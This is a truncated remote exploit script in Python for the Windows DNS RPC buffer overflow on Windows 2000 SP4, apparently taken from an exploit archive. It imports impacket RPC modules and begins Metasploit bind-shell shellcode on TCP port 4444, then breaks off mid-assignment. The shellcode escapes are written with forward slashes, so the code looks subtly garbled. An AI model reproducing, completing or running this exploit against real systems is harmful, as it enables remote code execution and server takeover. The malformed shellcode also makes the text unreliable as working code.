MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)

1. #!/usr/bin/python
2. # Remote exploit for the 0day Windows DNS RPC service vulnerability as
3. # described in [url]http://www.securityfocus.com/bid/23470/info.[/url] Tested on
4. # Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
5. # and then connects to it.
6. #
7. # Cheers to metasploit for the first exploit.
8. # Written for educational and testing purposes.
9. # Author shall bear no responsibility for any damage caused by using this code
10. # Winny Thomas :-)
12. import os
13. import sys
14. import time
15. from impacket.dcerpc import transport, dcerpc, epm
16. from impacket import uuid
18. #Portbind shellcode from metasploit; Binds port to TCP port 4444
19. shellcode = "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
20. shellcode += "/x29/xc9/x83/xe9/xb0/xe8/xff/xff/xff/xff/xc0/x5e/x81/x76/x0e/xe9"
21. shellcode += "/x4a/xb6/xa9/x83/xee/xfc/xe2/xf4/x15/x20/x5d/xe4/x01/xb3/x49/x56"
22. shellcode +=